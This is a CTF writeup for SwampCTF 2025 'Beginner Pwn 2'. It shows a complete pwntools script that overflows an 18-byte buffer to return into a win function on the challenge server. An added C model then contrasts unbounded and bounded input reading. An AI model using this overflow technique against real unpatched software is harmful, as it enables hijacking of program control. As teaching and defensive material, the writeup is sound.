Byte Babies
SwampCTF 2025: Beginner Pwn 2
Mar 31, 2025 - yoshixi - writeup, pwn
author: @yoshixi, solved with: @bentley
Challenge Info:
Category: Pwn

Solution
We take a look at checksec:

This is good. We have no PIE and no canary, so the win function sits at a fixed address and a stack overflow will not be detected. Straightforward.
Now we find the offset to the return address:

It turns out the buffer is 18 bytes, so anything written after those 18 bytes lands on the saved return address.
The final script:

```python
import pwn

r = pwn.remote("chals.swampctf.com", 40001)
win_addr = 0x401186          # address of the win function (no PIE, so it is fixed)

payload = b"A" * 18          # fill the 18-byte buffer up to the saved return address
payload += pwn.p64(win_addr) # overwrite the return address with win (little-endian)
r.sendline(payload)

print(r.recvall().decode('latin-1'))  # print flag
r.close()
```
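To make the mechanics concrete from the defender's side, here is an added example (not the challenge binary or the author's code) that models the frame in a plain struct: the 10-byte buffer size and frame layout are assumptions chosen so the saved return address sits 18 bytes in, as the writeup found. It feeds the same input shape to a gets()-style reader and to a bounded fgets()-style reader and reports what the frame would return to afterwards.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
/* Constructed model of the challenge frame, not the binary's own code.
 * Assumed: a 10-byte name buffer, then saved rbp, then the saved return
 * address, so ret starts 18 bytes in (the writeup's offset). No canary. */
#define NAME_SZ 10
#define RET_OFF 18
struct frame {                      /* byte arrays only: no padding */
    unsigned char name[NAME_SZ];
    unsigned char saved_rbp[8];
    unsigned char ret[8];           /* what `ret` will jump to */
};
/* Little-endian decode of the saved return address. */
uint64_t frame_ret(const struct frame *f)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | f->ret[i];
    return v;
}

/* Models gets(): copies the whole line regardless of NAME_SZ, so input bytes
 * 18..25 land on ret. Capped at the frame only so the model stays defined. */
void read_name_unbounded(struct frame *f, const unsigned char *in, size_t len)
{
    memcpy(f, in, len > sizeof *f ? sizeof *f : len);
}

/* Hardened replacement (the fgets(name, sizeof name, stdin) pattern): never
 * writes outside name[], NUL-terminates, returns 1 when input was cut short. */
int read_name_bounded(struct frame *f, const unsigned char *in, size_t len)
{
    size_t n = len < NAME_SZ - 1 ? len : NAME_SZ - 1;
    memcpy(f->name, in, n);
    f->name[n] = '\0';
    return len > n;
}

/* Feeds the writeup's input shape (18 filler bytes, then a little-endian 64-bit
 * address as pwn.p64 packs it) to one reader; returns the resulting ret, 0 if untouched. */
uint64_t ret_after(int bounded, uint64_t addr)
{
    unsigned char in[RET_OFF + 8];
    struct frame f = {0};
    memset(in, 'A', RET_OFF);
    for (int i = 0; i < 8; i++) in[RET_OFF + i] = (unsigned char)(addr >> (8 * i));
    if (bounded) read_name_bounded(&f, in, sizeof in);
    else read_name_unbounded(&f, in, sizeof in);
    return frame_ret(&f);
}
```

With the unbounded reader the frame returns to the supplied address; with the bounded reader the return address is untouched and the caller learns the input was truncated.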